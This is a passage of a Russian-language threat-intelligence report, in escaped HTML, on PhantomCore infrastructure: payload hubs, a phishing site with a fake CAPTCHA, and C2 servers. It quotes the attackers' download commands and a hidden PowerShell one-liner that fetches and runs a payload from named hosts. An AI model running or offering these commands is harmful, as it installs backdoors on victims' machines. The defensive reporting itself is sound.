RClone<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u0435\u0439 XenArmor All\u2011In\u2011One Password Recovery Pro<\/p>\n<p>\u0413\u0440\u0443\u043f\u043f\u0430 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore:<\/p>\n<\/li>\n<li>\n<p>\u0412\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u0441\u0430\u0439\u0442<\/p>\n<\/li>\n<\/ul>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defense Evasion) \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f PhantomTaskShell, MeshAgent \u0438 RSocx \u0438 \u0438\u0445 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430\u043c\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 PhantomRAT \u0438 PhantomRShell \u043f\u043e\u00a0\u043f\u0440\u044f\u043c\u043e\u043c\u0443 URL:<\/p>\n<p><code>up https:\/\/&lt;redacted&gt;\/inetpub.zip C:\\ProgramData\\inetpub.zip<\/code><\/p>\n<p><code>up https:\/\/&lt;redacted&gt;\/update.zip C:\\ProgramData\\update.zip<\/code><\/p>\n<p><code>up https:\/\/&lt;redacted&gt;\/hosts.zip C:\\ProgramData\\hosts.zip<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e69\/1f5\/ae9\/e691f5ae9e78ee368f3618439181f4d0.png\" alt=\"\u0412\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442\" title=\"\u0412\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442\" width=\"940\" height=\"296\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e69\/1f5\/ae9\/e691f5ae9e78ee368f3618439181f4d0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e69\/1f5\/ae9\/e691f5ae9e78ee368f3618439181f4d0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0412\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442<\/figcaption><\/div>\n<\/figure>\n<ul>\n<li>\n<p>VPS\u2011\u0445\u0430\u0431<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 SSH\u2011\u0441\u043b\u0443\u0436\u0431\u043e\u0439 \u0438 80\u00a0(HTTP) \u0438 443\u00a0(HTTPS) \u0441\u0435\u0442\u0435\u0432\u044b\u043c\u0438 \u043f\u043e\u0440\u0442\u0430\u043c\u0438, \u043c\u0435\u043d\u044f\u044e\u0449\u0438\u043c\u0438 \u0441\u0432\u043e\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0441\u00a0\u0437\u0430\u043a\u0440\u044b\u0442\u043e\u0433\u043e \u043d\u0430\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0435 (\u043f\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f\u043c \u0433\u0440\u0443\u043f\u043f\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438, \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u043e \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u0434\u043d\u044f, \u043a\u043e\u0433\u0434\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b).<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/65b\/843\/56c\/65b84356cf9a7a99f037101edb3d67d7.png\" alt=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c VPS-\u0445\u0430\u0431\u0430\" title=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c VPS-\u0445\u0430\u0431\u0430\" width=\"788\" height=\"170\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/65b\/843\/56c\/65b84356cf9a7a99f037101edb3d67d7.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/65b\/843\/56c\/65b84356cf9a7a99f037101edb3d67d7.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c VPS\u2011\u0445\u0430\u0431\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (Credential Access) \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0442\u0438\u043b\u0435\u0440\u0430 PhantomStealer \u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u0434\u043b\u044f\u00a0\u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u0435\u0439 XenArmor All\u2011In\u2011One Password Recovery Pro \u0438 \u0438\u0445 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u043c PhantomTaskShell \u043f\u043e\u00a0\u043f\u0440\u044f\u043c\u043e\u043c\u0443 URL:<\/p>\n<p><code>iwr -Uri \"http:\/\/188.127.254.234:80\/browser.zip\" -OutFile \"C:\\ProgramData\\browser.zip\"<\/code><\/p>\n<p><code>certutil.exe -urlcache -f http:\/\/188.127.254.234\/one.zip C:\\ProgramData\\one.zip<\/code><\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>188.127.254.234<\/code><\/p>\n<\/li>\n<li>\n<p>\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442<\/p>\n<p>\u0417\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u0430\u043a\u0430\u043d\u0443\u043d\u0435 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u0432\u00a0\u0430\u043f\u0440\u0435\u043b\u0435 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430, \u043d\u0430\u00a0\u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d\u0430 \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0430\u0434\u0440\u0435\u0441\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b iseh34228@proton[.]me.<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u0443\u044e HTML\u2011\u0432\u0435\u0440\u0441\u0442\u043a\u0443 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430 \u041c\u043e\u0441\u043a\u043e\u0432\u0441\u043a\u043e\u0433\u043e \u0433\u043e\u0440\u043e\u0434\u0441\u043a\u043e\u0433\u043e \u0444\u043e\u043d\u0434\u0430 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u043e\u0433\u043e \u0441\u0442\u0440\u0430\u0445\u043e\u0432\u0430\u043d\u0438\u044f, \u043f\u043e\u0431\u0443\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u043b\u0435\u0439 \u043f\u043e\u0434\u00a0\u043f\u0440\u0435\u0434\u043b\u043e\u0433\u043e\u043c \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f fake CAPTCHA \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u043e\u0431\u043c\u0435\u043d\u0430 \u0432\u00a0\u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 Windows.<\/p>\n<p><code>powershell -WindowStyle Hidden -Command \"&amp; {iwr 'https:\/\/mgfoms.org\/in.php?action=2' -OutFile '%userprofile%\\dnsclient.exe'; Start-Process '%userprofile%\\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}\"<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4f6\/425\/cd3\/4f6425cd3d5d7815897bba7061470d99.png\" alt=\"\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442 \u0441 fake CAPTCHA\" title=\"\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442 \u0441 fake CAPTCHA\" width=\"1280\" height=\"679\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4f6\/425\/cd3\/4f6425cd3d5d7815897bba7061470d99.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4f6\/425\/cd3\/4f6425cd3d5d7815897bba7061470d99.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442 \u0441\u00a0fake CAPTCHA<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0438 \u0441\u043a\u0440\u044b\u0442\u043e\u043c\u0443 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 MeshAgent, \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u0433\u043e \u0441\u00a0\u0442\u043e\u0433\u043e\u00a0\u0436\u0435 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441\u00a0\u0434\u043e\u043c\u0435\u043d\u043e\u043c austolns[.]pw, \u0447\u0442\u043e\u00a0\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440 MeshAgent, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0439 \u0441\u00a0\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u0448\u0435 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bea\/252\/df3\/bea252df3468232175ab4a3f18d6f4a6.png\" alt=\"\u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 MeshAgent\" title=\"\u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 MeshAgent\" width=\"701\" height=\"283\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/bea\/252\/df3\/bea252df3468232175ab4a3f18d6f4a6.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bea\/252\/df3\/bea252df3468232175ab4a3f18d6f4a6.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 MeshAgent<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442:<\/p>\n<p>mgfoms.org <\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440\u044b PhantomTaskShell \u0441\u00a0\u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 SSH\u2011\u0441\u043b\u0443\u0436\u0431\u043e\u0439 \u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c 80\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u043f\u043e\u0440\u0442\u043e\u043c, \u043d\u0430\u00a0\u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom c \u0432\u0435\u0431\u2011\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043e\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e62\/ce3\/8a4\/e62ce38a434ff04945250760a73d3a36.png\" alt=\"\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom\" title=\"\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom\" width=\"1280\" height=\"582\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e62\/ce3\/8a4\/e62ce38a434ff04945250760a73d3a36.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e62\/ce3\/8a4\/e62ce38a434ff04945250760a73d3a36.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0432\u0441\u0435\u0445 \u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438, \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0437\u0430\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435\u043c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0434\u043b\u044f\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0445\u043e\u0441\u0442\u0430\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440 PhantomTaskShell. \u041f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 API \u0434\u043b\u044f\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u00a0PowerShell\u2011\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0435\u00a0\u0436\u0435\u0440\u0442\u0432\u044b, \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0438\u0445 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/login\u00a0\u2014 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\/api\/clients\/\u00a0\u2014 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430<\/p>\n<\/li>\n<li>\n<p>\/api\/clients\/&lt;GUID&gt;\/commands\u00a0\u2014 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434<\/p>\n<\/li>\n<\/ul>\n<p>\u0412\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 favicon \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430 \u0441\u00a0\u043e\u0442\u0441\u044b\u043b\u043a\u043e\u0439 \u043a\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore, \u0432\u00a0\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043a\u043e\u043f\u0438\u0435\u0439 \u043f\u0435\u0440\u0432\u043e\u0439 \u0431\u0443\u043a\u0432\u044b \u0438\u0437\u00a0\u0441\u0442\u0438\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0439 \u0438\u0433\u0440\u044b \u0438 \u0438\u0437\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0438\u0437\u00a0\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0432\u00a0\u0438\u0433\u0440\u043e\u0432\u043e\u043c \u043a\u043e\u043c\u044c\u044e\u043d\u0438\u0442\u0438 PNG\u2011\u0442\u0440\u0430\u0444\u0430\u0440\u0435\u0442\u0430.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/599\/1d9\/9d5\/5991d99d57fa8b4a9072d7cfa314e6ff.png\" alt=\"Favicon \u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom\" title=\"Favicon \u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom\" width=\"116\" height=\"117\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/599\/1d9\/9d5\/5991d99d57fa8b4a9072d7cfa314e6ff.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/599\/1d9\/9d5\/5991d99d57fa8b4a9072d7cfa314e6ff.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>Favicon \u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom<\/figcaption><\/div>\n<\/figure>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a0f\/e77\/3ad\/a0fe773adba433ec5fe033c1bdb6c8e4.png\" alt=\"\u041e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043b\u044d\u043d\u0434\u0438\u043d\u0433 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0439 \u0438\u0433\u0440\u044b\" title=\"\u041e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043b\u044d\u043d\u0434\u0438\u043d\u0433 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0439 \u0438\u0433\u0440\u044b\" width=\"460\" height=\"215\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a0f\/e77\/3ad\/a0fe773adba433ec5fe033c1bdb6c8e4.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a0f\/e77\/3ad\/a0fe773adba433ec5fe033c1bdb6c8e4.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043b\u044d\u043d\u0434\u0438\u043d\u0433 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0439 \u0438\u0433\u0440\u044b<\/figcaption><\/div>\n<\/figure>\n<p>\u0423\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043e\u0442\u043f\u0435\u0447\u0430\u0442\u043a\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0432\u00a0\u0445\u043e\u0434\u0435 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441\u00a0\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043d\u0435\u043b\u044c\u044e Phantom, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u044c \u0438\u0445 \u0432\u0437\u0430\u0438\u043c\u043e\u0441\u0432\u044f\u0437\u044c \u043f\u043e\u00a0\u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0434\u043d\u043e\u0439 C2-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (payload\u2011\u0445\u0430\u0431\u044b, \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0430\u0433\u0440\u0435\u0433\u0430\u0442\u043e\u0440\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445), \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0442\u044c \u0437\u043d\u0430\u043d\u0438\u044f \u043e\u00a0\u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 